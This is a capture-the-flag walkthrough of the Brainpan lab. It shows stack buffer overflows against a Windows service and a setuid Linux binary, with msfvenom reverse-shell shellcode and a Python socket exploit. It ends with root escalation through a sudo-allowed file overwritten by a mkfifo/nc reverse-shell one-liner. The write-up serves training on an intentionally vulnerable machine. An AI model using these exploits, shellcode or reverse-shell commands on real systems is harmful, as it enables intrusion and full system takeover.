# Brainpan (VulnHub)

  • This Lab from Vulnhub , name is Brainpan
  • You can get this lab image from Hereand
  • This is also avaliable at Tryhackme check here
  • After setup , we need to find this lab ip address
  • Finding Ip address you can use your choice tool but i used netdiscover
  • $ netdiscover -i enp2s0
    Currently scanning:   |   Screen View: Unique Hosts                                                                                                                         
     3 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 864                                                                                                                            
       IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
     -----------------------------------------------------------------------------   18:3d:5e:a5:e2:94     12     720  HUAWEI TECHNOLOGIES CO.,LTD                                                                                                             08:00:27:14:78:ed      1      42  PCS Systemtechnik GmbH                                                                                                                  08:00:27:2f:b3:09      1      42  PCS Systemtechnik GmbH                                                                                                                    

    # Scanning (Nmap)

    $ nmap -sSV -O -A -sC oN brainpan.nmap
    # Nmap 7.80 scan initiated Mon Sep  7 23:55:37 2020 as: nmap -sSV -O -A -sC -oN brainpan.nmap
    Nmap scan report for
    Host is up (0.0012s latency).
    Not shown: 998 closed ports
    9999/tcp  open  abyss?
    | fingerprint-strings: 
    |   NULL: 
    |     _| _| 
    |     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 
    |     _|_| _| _| _| _| _| _| _| _| _| _| _|
    |     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
    |     [________________________ WELCOME TO BRAINPAN _________________________]
    10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
    |_http-title: Site doesn't have a title (text/html).

    # Web

    • nmap Result show port 9999 and port 10000(Python Simple Http Server) is running

    • I type this ip address in browser , I saw this webpage
      Sample Image

    • I used gobuster to find some interesting and useful dir

    • I found one folder this is /bin , I found one exe file in this folder Sample Image

    • I download this exe file
    • I used string to see this exe file
      Sample Image

    • I checked port 9999 with nc , In this time I know this brainpan.exe file is running at port 9999

      $ nc 9999
      _|                            _|                                        
      _|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
      _|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
      _|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
      _|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
      [________________________ WELCOME TO BRAINPAN _________________________]
                                ENTER THE PASSWORD                              
                                >> AAAAAAAAAAAAAAa
                                ACCESS DENIED
    • We need to buffer overflow this

    # Debugging Stage

      • I move this exe file to my window machine and open Immunity Debugger and run this exe file

      • I send 1000 bytes of A and this program is crashed
      • Sample Image
      • EIP and EBP fill with 41414141 (41 is A)
      • Next Step We need to know how many bytes need to fill our buffer with in order to get us to eip ??

      • I used Metasploit pattern_create tool. Let's Create pattern to start
      • $ pattern_create -l 1000 | nc 9999 
      • Crashed Again and we have successfully overwriten EIP .
      • Sample Image
      • Take note of the EIP address 35724134
      • We'll push this address into Metasploit pattern_offet tool , that will give use the number of bytes we need to send to our buffer in order to control EIP
      • $ pattern_offset --query 35724134 
        [*] Exact match at offset 524
      • You can use mona to find this offset
        Sample Image

      • Next Step We need to find the address of a jmp esp fucntion. Finding this address is straight forward
      • $ objdump -d brainpan.exe | grep -i jmp | grep -i esp
        311712f3:      ff e4                jmp    *%esp

      #Generating Shell Code

      • We need to generatre shell code
      • I used this command to generate linux shell code
        # msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=4444 -b '\x00' -f python
        [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
        [-] No arch selected, selecting arch: x86 from the payload
        Found 11 compatible encoders
        Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
        x86/shikata_ga_nai succeeded with size 95 (iteration=0)
        x86/shikata_ga_nai chosen with final size 95
        Payload size: 95 bytes
        Final size of python file: 479 bytes
        buf += b"\xbd\xda\x30\xda\x22\xda\xc7\xd9\x74\x24\xf4\x5a\x2b"
        buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x6a\x0e\x03\xb0\x3e\x38"
        buf += b"\xd7\x75\xe4\x4b\xfb\x26\x59\xe7\x96\xca\xd4\xe6\xd7"
        buf += b"\xac\x2b\x68\x84\x69\x04\x56\x66\x09\x2d\xd0\x81\x61"
        buf += b"\x6e\x8a\x16\x65\x06\xc9\xd6\x94\x8a\x44\x37\x26\x54"
        buf += b"\x07\xe9\x15\x2a\xa4\x80\x78\x81\x2b\xc0\x12\x74\x03"
        buf += b"\x96\x8a\xe0\x74\x77\x28\x98\x03\x64\xfe\x09\x9d\x8a"
        buf += b"\x4e\xa6\x50\xcc"

      # Exploitation

      • Let's Write Exploit

      • My Exploit Code is here
      • $ cat exploit.py
        import socket, sys, os
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('', 9999))
        buf =  b"\xbd\xda\x30\xda\x22\xda\xc7\xd9\x74\x24\xf4\x5a\x2b"
        buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x6a\x0e\x03\xb0\x3e\x38"
        buf += b"\xd7\x75\xe4\x4b\xfb\x26\x59\xe7\x96\xca\xd4\xe6\xd7"
        buf += b"\xac\x2b\x68\x84\x69\x04\x56\x66\x09\x2d\xd0\x81\x61"
        buf += b"\x6e\x8a\x16\x65\x06\xc9\xd6\x94\x8a\x44\x37\x26\x54"
        buf += b"\x07\xe9\x15\x2a\xa4\x80\x78\x81\x2b\xc0\x12\x74\x03"
        buf += b"\x96\x8a\xe0\x74\x77\x28\x98\x03\x64\xfe\x09\x9d\x8a"
        buf += b"\x4e\xa6\x50\xcc"
        payload = "A" * 524 + "\xf3\x12\x17\x31" +"\x90" * 10 + buf
      • The Logic of the exploit is :

      •  524 Junk + JMP ESP Address + 10 Bytes NOPS + Shellcode 
      • On the other tab of my terminal , I used ncat to listen at port 4444 and I run this exploit

      • Boom I got Reverse Shell
        $ sudo ncat -lvnp 4444
        Ncat: Version 7.80 ( https://nmap.org/ncat )
        Ncat: Listening on :::4444
        Ncat: Listening on
        Ncat: Connection from
        Ncat: Connection from
        uid=1002(puck) gid=1002(puck) groups=1002(puck)
      • I got a shell as use puck

      • After finding a few mins, I found one binary file owner is user anansi

      • Sample Image
      • After fuzzing , I know this is buffer overflow vulnerability too.

      • I created 200 bytes with metasploit pattern_create tool
        $ pattern_create -l 200 
      • $ gdb-peda$ r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
        Starting program: /vulnhub/Brainpan/validate Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
        Program received signal SIGSEGV, Segmentation fault.
        EAX: 0xffffcf58 ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        EBX: 0x41366441 ('Ad6A')
        ECX: 0xffffd350 --> 0x48530067 ('g')
        EDX: 0xffffd01f --> 0x67 ('g')
        ESI: 0xf7f93e1c --> 0x1edd2c 
        EDI: 0xf7f93e1c --> 0x1edd2c 
        EBP: 0x64413764 ('d7Ad')
        ESP: 0xffffcfd0 ("Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        EIP: 0x39644138 ('8Ad9')
        EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
        Invalid $PC address: 0x39644138
        0000| 0xffffcfd0 ("Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0004| 0xffffcfd4 ("e1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0008| 0xffffcfd8 ("2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0012| 0xffffcfdc ("Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0016| 0xffffcfe0 ("e5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0020| 0xffffcfe4 ("6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0024| 0xffffcfe8 ("Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        0028| 0xffffcfec ("e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag")
        Legend: code, data, rodata, value
        Stopped reason: SIGSEGV
        0x39644138 in ?? ()
      • We need to find the offset
        $ pattern_offset -q 39644138
        [*] Exact match at offset 116
      • we found the crash offset value. So we can overwrite the EIP after 116 bytes.
      • I’ve tried to find the JMP ESP instructions. But it was not that easy so I couldn’t find it
      • After fuzzing with gdb and looked into register , I noticed EAX value was the same as offet starting address
      • This mean we can find CALL EAX address we can jump to our shellcode
      • $ objdump -d validate | grep -i call | grep -i eax
         8048468:	ff 14 85 14 9f 04 08 	call   *0x8049f14(,%eax,4)
         80484af:	ff d0                	call   *%eax
         804862b:	ff d0                	call   *%eax
      • Finally I found the EAX address and we can exploit this easily
      • Our payload:
          MAX[116]Bytes Shellcode + CALL EAX ADDRESS 
      #Exploitation Part 2
      • I search shellcode at google I found this link 28 bytes Shellcode

      • This is 28 bytes /bin/sh shellcode
      • Max 116 - 28 (Shellcode) = 88
      • Finaly payload like :
         "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"  + ("A" * 88) + "\xaf\x84\x04\x08" 
        $ puck@brainpan:/usr/local/bin$ ./validate `python -c 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + ("\x41" * 88) + "\xaf\x84\x04\x08"'`
        uid=1002(puck) gid=1002(puck) euid=1001(anansi) groups=1001(anansi),1002(puck)
        /bin/sh -i
        /bin/sh: 0: can't access tty; job control turned off
        $ id
        uid=1002(puck) gid=1002(puck) euid=1001(anansi) groups=1001(anansi),1002(puck)
        $ whoami
      • I got user anansi

      # Privileges Escalation

        $ sudo -l
        Matching Defaults entries for puck on this host:
            env_reset, mail_badpass,
        User puck may run the following commands on this host:
            (root) NOPASSWD: /home/anansi/bin/anansi_util
      • After playing with sudo -l , we can find we can run /home/anansi/bin/anansi_util as root
      • I replace my reverse shell payload file instead of original anansi_util file
      • $ whereis nc
        nc: /bin/nc /bin/nc.openbsd /usr/share/man/man1/nc.1.gz
        $ cd bin
        $ ls
        $ rm anansi_util
        $ ls
        $ mv anansi.util anansi.bak
        $ ls
        $ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f " > anansi_util 
        $ ls
        $ cat anansi_util
        rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9001 >/tmp/f
      • In other tab of my terminal , I used ncat to listen and i run this anansi_utils file with sudo

      • I got reverse shell as root
      • $ sudo ncat -lvnp 9001
        [sudo] password for k3nx: 
        Ncat: Version 7.80 ( https://nmap.org/ncat )
        Ncat: Listening on :::9001
        Ncat: Listening on
        Ncat: Connection from
        Ncat: Connection from
        /bin/sh: 0: can't access tty; job control turned off
        # id
        uid=0(root) gid=0(root) groups=0(root)
        # whoami
        # /bin/bash -i
        bash: no job control in this shell
        root@brainpan:/home/anansi/bin# cd
        root@brainpan:~# ls
        root@brainpan:~# cat b.txct
        cat b.txct
        root@brainpan:~# cat b.txt
        cat b.txt
        _|                            _|                                        
        _|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
        _|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
        _|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
        _|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
      • Finally I got root Shell

      • Thank for reading , I hope you learn something :"(